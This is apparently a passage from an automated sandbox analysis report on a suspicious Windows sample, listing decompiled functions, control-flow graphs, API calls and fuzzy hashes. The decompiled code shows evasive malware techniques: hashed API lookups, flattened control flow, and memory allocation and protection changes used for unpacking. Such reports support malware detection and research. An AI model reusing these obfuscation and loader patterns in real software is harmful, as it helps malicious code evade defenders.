                                                                                0x002a3139
                                                                                0x002a3147
                                                                                0x002a314b
                                                                                0x002a3153
                                                                                0x002a315b
                                                                                0x002a3175
                                                                                0x002a317f
                                                                                0x002a3187
                                                                                0x002a318b
                                                                                0x002a3193
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a30ec
                                                                                0x002a30e1
                                                                                0x002a30d6
                                                                                0x00000000
                                                                                0x002a30cb
                                                                                0x002a3206
                                                                                0x002a3245
                                                                                0x002a324c
                                                                                0x002a325f
                                                                                0x002a3264
                                                                                0x002a3264
                                                                                0x002a326b
                                                                                0x002a3274
                                                                                0x002a328c
                                                                                0x002a328c
                                                                                0x002a3299
                                                                                0x002a329b
                                                                                0x002a329f
                                                                                0x00000000
                                                                                0x002a32a1
                                                                                0x002a32a1
                                                                                0x00000000
                                                                                0x002a32a1
                                                                                0x002a3208
                                                                                0x002a320d
                                                                                0x002a32ab
                                                                                0x002a32b3
                                                                                0x002a32cb
                                                                                0x002a32cd
                                                                                0x002a32cd
                                                                                0x002a32e4
                                                                                0x002a32e6
                                                                                0x002a32ed
                                                                                0x002a32f0
                                                                                0x002a32f3
                                                                                0x00000000
                                                                                0x002a3213
                                                                                0x002a3218
                                                                                0x00000000
                                                                                0x002a321a
                                                                                0x002a3221
                                                                                0x002a3223
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x00000000
                                                                                0x002a30ba
                                                                                0x002a30ba
                                                                                0x002a3218
                                                                                0x002a320d
                                                                                0x00000000
                                                                                0x002a322d
                                                                                0x002a322d
                                                                                0x002a3242
                                                                                0x00000000
                                                                                0x002a3242

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,0000024C), ref: 002A3299
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: |.
                                                                                • API String ID: 1279760036-512043466
                                                                                • Opcode ID: 63780f75e840b71f4b3cd04452af713962b391d0368045dde457e7971bfa90eb
                                                                                • Instruction ID: 92f244cbe6f55373aed37e5bcaec966f6d2b5d32dd295e3e1c622346c0ba2189
                                                                                • Opcode Fuzzy Hash: 63780f75e840b71f4b3cd04452af713962b391d0368045dde457e7971bfa90eb
                                                                                • Instruction Fuzzy Hash: 8051A271A283028BCB18DF6C948452ABBE6EBD6344F20481EF452CB351DF71DE598B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290580, Relevance: 3.1, APIs: 2, Instructions: 127memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 508 290580-2905be call 290ed0 511 2905c0-2905cf 508->511 512 2905d2-2905da 508->512 513 2905e0-2905e3 512->513 514 2906e7-2906ef 512->514 513->514 515 2905e9-2905eb 513->515 515->514 516 2905f1-2905fc 515->516 516->514 518 290602-290607 516->518 519 2906d8-2906e4 518->519 520 29060d-290629 call 291140 RtlMoveMemory 518->520 523 29062b-290630 520->523 524 290654-290659 520->524 525 290643-290652 523->525 526 290632-290641 523->526 527 29065b-29066a 524->527 528 29066c-290678 524->528 529 290679-290699 call 291140 525->529 526->529 527->529 528->529 529->514 532 29069b-2906a3 VirtualProtect 529->532 533 2906a5-2906a8 532->533 534 2906c6-2906d5 532->534 533->514 535 2906aa-2906ad 533->535 535->514 536 2906af-2906b1 535->536 536->520 537 2906b7-2906c3 536->537
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 0029061B
                                                                                • VirtualProtect.KERNEL32(00000000,-00000018,?,00000000,00000000,00000000,-00000018,00000028,?,?,?,00000000,00000000,?,00000000), ref: 0029069C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 4043890290-0
                                                                                • Opcode ID: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction ID: a69c49993e132326122a1f774ea24a554d4b1c486d9f4a97481f3ba59b2f58b4
                                                                                • Opcode Fuzzy Hash: b94b9ae67b6adb9e0137934aeccaac81b37d054c99ee4087dee3bfd6cde587a0
                                                                                • Instruction Fuzzy Hash: 3D315AB367430A5BEB249A65DCC5BFBA3D8DBD1354F08043AF909C2290D62FD4B4C265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A5CE0, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 538 2a5ce0-2a5cec call 2a65e0 541 2a5d09-2a5d0d ExitProcess 538->541 542 2a5cee-2a5d04 call 2a3f00 call 2a3e60 538->542 542->541
                                                                                C-Code - Quality: 100%
                                                                                			_entry_() {
				void* _t5;
				void* _t9;

				E002A65E0();
				if( *0x2addb8 == 0) {
					 *0x2addb8 = E002A3E60(_t5, E002A3F00(0x9bab0b12), 0x89f3d704, _t9);
				}
				ExitProcess(0);
			}





                                                                                0x002a5ce0
                                                                                0x002a5cec
                                                                                0x002a5d04
                                                                                0x002a5d04
                                                                                0x002a5d0b

                                                                                APIs
                                                                                • ExitProcess.KERNELBASE(00000000), ref: 002A5D0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExitProcess
                                                                                • String ID:
                                                                                • API String ID: 621844428-0
                                                                                • Opcode ID: 8c684f9df9c0993833c1e6cefdcacc7f21a822c44ed7f8945126c37afdf772a6
                                                                                • Instruction ID: fdbcfa52bb5a5a7dd2ce81898b98e10e066167c7a5c4f2020106b986dad8522c
                                                                                • Opcode Fuzzy Hash: 8c684f9df9c0993833c1e6cefdcacc7f21a822c44ed7f8945126c37afdf772a6
                                                                                • Instruction Fuzzy Hash: ECD0C96172461547DB44ABB5684976A269A4FA2748F104019F112CB696FE208D20AB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290AD0, Relevance: 2.7, APIs: 2, Instructions: 175memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 547 290ad0-290b31 call 290ed0 550 290b33-290b42 547->550 551 290b47-290b4d 547->551 552 290d40 550->552 553 290b5f-290b7b 551->553 554 290b4f-290b54 551->554 556 290b7d-290b8e 553->556 557 290b90 553->557 554->553 558 290b96-290b9c 556->558 557->558 560 290bae-290bca 558->560 561 290b9e-290ba3 558->561 563 290bcc-290bd4 560->563 564 290bd7-290c21 VirtualAlloc 560->564 561->560 563->564 568 290d1a-290d24 564->568 569 290c27-290c2e 564->569 568->552 570 290c30-290c3f 569->570 571 290c44-290c4b 569->571 570->552 572 290c5d-290c79 571->572 573 290c4d-290c52 571->573 575 290c7b-290c83 572->575 576 290c86-290c8d 572->576 573->572 575->576 577 290c9f-290cbb 576->577 578 290c8f-290c94 576->578 580 290cc8-290cfa VirtualAlloc 577->580 581 290cbd-290cc5 577->581 578->577 584 290d02-290d07 580->584 581->580 584->568 585 290d09-290d18 584->585 585->552
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000), ref: 00290BFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 1654584625-0
                                                                                • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction ID: 4321f6d9c682fcdf21d2e7bafdfd2cd57da223c468b21556970a8fc743171e49
                                                                                • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                                                • Instruction Fuzzy Hash: 34510170A50218AFDB248F54CE86FEAB7B8EF54B01F004095FA08B7190D6B89D85CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A80A0, Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 699 2a80a0-2a815b 700 2a8163-2a8168 699->700 701 2a8170-2a8175 700->701 702 2a817b 701->702 703 2a8338-2a833d 701->703 704 2a8181-2a8186 702->704 705 2a8287-2a829b call 2a34c0 702->705 706 2a836f-2a8377 703->706 707 2a833f-2a8344 703->707 708 2a818c-2a8191 704->708 709 2a8252-2a8259 704->709 725 2a82bb-2a82e3 705->725 726 2a829d-2a82b5 call 2a3f00 call 2a3e60 705->726 713 2a8379-2a8391 call 2a3f00 call 2a3e60 706->713 714 2a8397-2a83bb CreateFileW 706->714 710 2a8346-2a834b 707->710 711 2a8365-2a836a 707->711 720 2a81e3-2a821a 708->720 721 2a8193-2a8198 708->721 716 2a825b-2a8271 call 2a3f00 call 2a3e60 709->716 717 2a8276-2a8282 709->717 722 2a834d-2a8352 710->722 723 2a83c7-2a83ce 710->723 711->701 713->714 718 2a83ee-2a83fa 714->718 719 2a83bd-2a83c2 714->719 716->717 717->701 719->701 732 2a821c-2a8232 call 2a3f00 call 2a3e60 720->732 733 2a8237-2a824d 720->733 721->722 731 2a819e-2a81e1 call 2ab6e0 721->731 722->701 734 2a8358-2a8364 722->734 729 2a83eb 723->729 730 2a83d0-2a83e6 call 2a3f00 call 2a3e60 723->730 751 2a8300-2a830b 725->751 752 2a82e5-2a82fb call 2a3f00 call 2a3e60 725->752 726->725 729->718 730->729 731->701 732->733 733->701 762 2a8328-2a8333 751->762 763 2a830d-2a8323 call 2a3f00 call 2a3e60 751->763 752->751 762->700 763->762
                                                                                C-Code - Quality: 66%
                                                                                			E002A80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t91;
				void* _t95;
				intOrPtr _t100;
				char _t104;
				signed int _t121;
				void* _t124;
				void* _t126;
				void* _t127;
				signed int* _t128;
				void* _t130;

				_t121 = __edx;
				_t128 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t127 = _v584;
				_t95 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t130 = _t58 - 0xea5411f;
							if(_t130 > 0) {
								break;
							}
							if(_t130 == 0) {
								_t72 = E002A34C0(0x2ad970);
								_t121 =  *0x2ae158;
								_t126 = _t72;
								if(_t121 == 0) {
									_t121 = E002A3E60(_t95, E002A3F00(0xc6fbcd74), 0xba71dd03, _t127);
									 *0x2ae158 = _t121;
								}
								_t100 =  *0x2ae54c; // 0x32e198
								_t50 = _t100 + 0x260; // 0x32e3f8
								_t51 = _t100 + 0x18; // 0x32e1b0
								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
								_t77 =  *0x2ae494;
								_t128 =  &(_t128[5]);
								if(_t77 == 0) {
									_t82 = E002A3F00(0x9bab0b12);
									_t121 = 0x7facde30;
									_t77 = E002A3E60(_t95, _t82, 0x7facde30, _t127);
									 *0x2ae494 = _t77;
								}
								_t124 =  *_t77();
								_t79 =  *0x2adf30;
								if(_t79 == 0) {
									_t81 = E002A3F00(0x9bab0b12);
									_t121 = 0x5010a54d;
									_t79 = E002A3E60(_t95, _t81, 0x5010a54d, _t127);
									 *0x2adf30 = _t79;
								}
								 *_t79(_t124, 0, _t126);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t85 =  *0x2ae1d4;
									if(_t85 == 0) {
										_t87 = E002A3F00(0x9bab0b12);
										_t121 = 0xa229df38;
										_t85 = E002A3E60(_t95, _t87, 0xa229df38, _t127);
										 *0x2ae1d4 = _t85;
									}
									 *_t85( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t88 = _v568;
										_t104 = _v572;
										_v560 = _t88;
										_v552 = _t88;
										_v544 = _t88;
										_v536 = _t88;
										_t89 =  *0x2adee4;
										_v564 = _t104;
										_v556 = _t104;
										_v548 = _t104;
										_v540 = _t104;
										_v532 = 0;
										if(_t89 == 0) {
											_t91 = E002A3F00(0x9bab0b12);
											_t121 = 0x4bf45878;
											_t89 = E002A3E60(_t95, _t91, 0x4bf45878, _t127);
											 *0x2adee4 = _t89;
										}
										 *_t89(_t127, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t95 =  !=  ? 1 : _t95;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E002AB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t121;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x2ade04 == 0) {
								_t66 = E002A3F00(0x9bab0b12);
								_t121 = 0xb66d748a;
								 *0x2ade04 = E002A3E60(_t95, _t66, 0xb66d748a, _t127);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t127 = _t64;
							if(_t127 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									_t68 =  *0x2ade3c;
									if(_t68 == 0) {
										_t68 = E002A3E60(_t95, E002A3F00(0x9bab0b12), 0x20de7595, _t127);
										 *0x2ade3c = _t68;
									}
									 *_t68(_t127);
									L34:
									return _t95;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t95;
					goto L35;
				}
			}














































                                                                                0x002a80a0
                                                                                0x002a80a0
                                                                                0x002a80a6
                                                                                0x002a80ae
                                                                                0x002a80b3
                                                                                0x002a80bb
                                                                                0x002a80c3
                                                                                0x002a80ca
                                                                                0x002a80ce
                                                                                0x002a80d2
                                                                                0x002a80d9
                                                                                0x002a80e0
                                                                                0x002a80e7
                                                                                0x002a80ee
                                                                                0x002a80f5
                                                                                0x002a80fc
                                                                                0x002a8103
                                                                                0x002a8112
                                                                                0x002a8116
                                                                                0x002a8119
                                                                                0x002a811d
                                                                                0x002a8125
                                                                                0x002a8133
                                                                                0x002a8137
                                                                                0x002a813f
                                                                                0x002a8147
                                                                                0x002a814f
                                                                                0x002a8153
                                                                                0x002a815b
                                                                                0x002a8163
                                                                                0x002a8163
                                                                                0x002a8168
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8170
                                                                                0x002a8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a817b
                                                                                0x002a828c
                                                                                0x002a8291
                                                                                0x002a8297
                                                                                0x002a829b
                                                                                0x002a82b3
                                                                                0x002a82b5
                                                                                0x002a82b5
                                                                                0x002a82bb
                                                                                0x002a82c1
                                                                                0x002a82c8
                                                                                0x002a82d7
                                                                                0x002a82d9
                                                                                0x002a82de
                                                                                0x002a82e3
                                                                                0x002a82ea
                                                                                0x002a82ef
                                                                                0x002a82f6
                                                                                0x002a82fb
                                                                                0x002a82fb
                                                                                0x002a8302
                                                                                0x002a8304
                                                                                0x002a830b
                                                                                0x002a8312
                                                                                0x002a8317
                                                                                0x002a831e
                                                                                0x002a8323
                                                                                0x002a8323
                                                                                0x002a832c
                                                                                0x002a832e
                                                                                0x00000000
                                                                                0x002a8181
                                                                                0x002a8186
                                                                                0x002a8252
                                                                                0x002a8259
                                                                                0x002a8260
                                                                                0x002a8265
                                                                                0x002a826c
                                                                                0x002a8271
                                                                                0x002a8271
                                                                                0x002a827b
                                                                                0x002a827d
                                                                                0x00000000
                                                                                0x002a818c
                                                                                0x002a8191
                                                                                0x002a81e3
                                                                                0x002a81e7
                                                                                0x002a81eb
                                                                                0x002a81ef
                                                                                0x002a81f3
                                                                                0x002a81f7
                                                                                0x002a81fb
                                                                                0x002a8200
                                                                                0x002a8204
                                                                                0x002a8208
                                                                                0x002a820c
                                                                                0x002a8210
                                                                                0x002a821a
                                                                                0x002a8221
                                                                                0x002a8226
                                                                                0x002a822d
                                                                                0x002a8232
                                                                                0x002a8232
                                                                                0x002a8241
                                                                                0x002a8245
                                                                                0x002a824a
                                                                                0x00000000
                                                                                0x002a8193
                                                                                0x002a8198
                                                                                0x00000000
                                                                                0x002a819e
                                                                                0x002a81a0
                                                                                0x002a81a8
                                                                                0x002a81c4
                                                                                0x002a81c8
                                                                                0x002a81d4
                                                                                0x002a81d8
                                                                                0x002a81dd
                                                                                0x00000000
                                                                                0x002a81dd
                                                                                0x002a8198
                                                                                0x002a8191
                                                                                0x002a8186
                                                                                0x00000000
                                                                                0x002a817b
                                                                                0x002a833d
                                                                                0x002a8377
                                                                                0x002a837e
                                                                                0x002a8383
                                                                                0x002a8391
                                                                                0x002a8391
                                                                                0x002a83b4
                                                                                0x002a83b6
                                                                                0x002a83bb
                                                                                0x00000000
                                                                                0x002a83bd
                                                                                0x002a83bd
                                                                                0x00000000
                                                                                0x002a83bd
                                                                                0x002a833f
                                                                                0x002a8344
                                                                                0x002a8365
                                                                                0x00000000
                                                                                0x002a8346
                                                                                0x002a834b
                                                                                0x002a83c7
                                                                                0x002a83ce
                                                                                0x002a83e1
                                                                                0x002a83e6
                                                                                0x002a83e6
                                                                                0x002a83ec
                                                                                0x002a83f1
                                                                                0x002a83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x002a834b
                                                                                0x002a8344
                                                                                0x00000000
                                                                                0x002a834d
                                                                                0x002a834d
                                                                                0x002a8364
                                                                                0x00000000
                                                                                0x002a8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 002A83B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 5b171dbf3455033e950fbfa492bdb63242653b883d9b301282758081b89dea95
                                                                                • Instruction ID: 754d77ea9a6d71d4753036f48364b96d296da94dc2ede6bca522c4cc669fdf41
                                                                                • Opcode Fuzzy Hash: 5b171dbf3455033e950fbfa492bdb63242653b883d9b301282758081b89dea95
                                                                                • Instruction Fuzzy Hash: B1819E70A283018FDB18DF68D84462BB7E5EB96744F00092DF58AC7291EF74DD158F52
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002A7080, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E002A7080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
				struct HINSTANCE__* _t6;
				intOrPtr* _t7;
				intOrPtr* _t9;
				intOrPtr _t17;
				signed int _t28;
				void* _t29;
				WCHAR* _t30;
				void* _t31;

				_t15 = __ebx;
				_t28 = __edx;
				_t30 = E002A34C0(__ecx);
				if( *0x2add1c == 0) {
					 *0x2add1c = E002A3E60(__ebx, E002A3F00(0x9bab0b12), 0xe4b28d97, _t31);
				}
				_t6 = LoadLibraryW(_t30);
				_t17 =  *0x2ae548; // 0x367e98
				 *(_t17 + 0x30 + _t28 * 4) = _t6;
				_t7 =  *0x2ae494;
				if(_t7 == 0) {
					_t7 = E002A3E60(_t15, E002A3F00(0x9bab0b12), 0x7facde30, _t31);
					 *0x2ae494 = _t7;
				}
				_t29 =  *_t7();
				_t9 =  *0x2adf30;
				if(_t9 == 0) {
					_t9 = E002A3E60(_t15, E002A3F00(0x9bab0b12), 0x5010a54d, _t31);
					 *0x2adf30 = _t9;
				}
				return  *_t9(_t29, 0, _t30);
			}











                                                                                0x002a7080
                                                                                0x002a7082
                                                                                0x002a7089
                                                                                0x002a7092
                                                                                0x002a70aa
                                                                                0x002a70aa
                                                                                0x002a70b0
                                                                                0x002a70b2
                                                                                0x002a70b8
                                                                                0x002a70bc
                                                                                0x002a70c3
                                                                                0x002a70d6
                                                                                0x002a70db
                                                                                0x002a70db
                                                                                0x002a70e2
                                                                                0x002a70e4
                                                                                0x002a70eb
                                                                                0x002a70fe
                                                                                0x002a7103
                                                                                0x002a7103
                                                                                0x002a7110

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,002A721D,002A68AC), ref: 002A70B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287225432.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                                                                • Associated: 00000009.00000002.2287178032.00000000002A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287302605.00000000002AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000009.00000002.2287339879.00000000002AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_2a0000_WPDShextAutoplay.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 9f0614d1a557f3036bdd3f790692ee25062b6b9846afcc9fd56a772f7f0fb92f
                                                                                • Instruction ID: 6bcecbe3b0313159c9d0e84d07809e682139281b400e1a911fdc61c55b77266b
                                                                                • Opcode Fuzzy Hash: 9f0614d1a557f3036bdd3f790692ee25062b6b9846afcc9fd56a772f7f0fb92f
                                                                                • Instruction Fuzzy Hash: D301AD30B342110B9B14EF79AC4462B6AEBAFE77487100029F01ADB716FF34CD228B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00290170, Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00290F08
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00290F3E
                                                                                  • Part of subcall function 00290FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00290F7F
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 002902F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 223123264-0
                                                                                • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction ID: 68086e4e3c97a80a1c88be63500ed404a1020e27710f247e688696b98ec5719a
                                                                                • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                                                • Instruction Fuzzy Hash: 895136B191026DAFDF20DF64DD88BDEB778EF88700F004599E609B7250DB746A858FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                Function 00290010, Relevance: 12.6, Strings: 10, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                                                • API String ID: 0-211638553
                                                                                • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction ID: 34c029d72720cc7f6f06126075ba7e34b983191afe3636a707896162755dafb5
                                                                                • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                                                • Instruction Fuzzy Hash: BD311A38E5112C9BCB04DB98CD80AED7BB5FF4C340B508026D506736A4DB789986CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 002906F0, Relevance: 9.2, APIs: 6, Instructions: 169COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction ID: 72f3180afffbd22a35795a45432937cb0e49314531f45cafe6918c1da7ea8691
                                                                                • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                                                • Instruction Fuzzy Hash: 405196B2B243065FDB10DF26C881B6BB3D8AFD47A4F04092DF948E7241E235D9358B92
                                                                                Uniqueness

